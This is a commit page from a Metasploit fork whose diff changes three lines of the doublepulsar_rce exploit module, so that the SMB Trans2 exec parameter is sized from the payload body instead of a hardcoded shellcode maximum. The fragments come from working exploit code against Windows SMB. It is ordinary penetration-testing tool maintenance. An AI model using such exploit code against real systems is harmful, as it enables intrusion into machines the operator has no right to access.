adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Don't hardcode body size

Browse Source
This commit is contained in:
William Vu
2019-09-30 12:31:57 -05:00
parent ed0b856aac
commit b1f2fa4e64
1 changed files with 3 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/windows/smb/doublepulsar_rce.rb
+3 -3
View File
@@ -112,12 +112,12 @@ class MetasploitModule < Msf::Exploit::Remote
0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00
end
def generate_doublepulsar_param(op)
def generate_doublepulsar_param(op, body)
case OPCODES.key(op)
when :ping, :kill
"\x00" * 12
when :exec
Rex::Text.xor([@xor_key].pack('V'), [MAX_SHELLCODE_SIZE, MAX_SHELLCODE_SIZE, 0].pack('V*'))
Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))
end
end
@@ -257,7 +257,7 @@ class MetasploitModule < Msf::Exploit::Remote
setup_count = 1
setup_data = [0x000e].pack('v')
param = generate_doublepulsar_param(opcode)
param = generate_doublepulsar_param(opcode, body)
data = param + body.to_s
pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct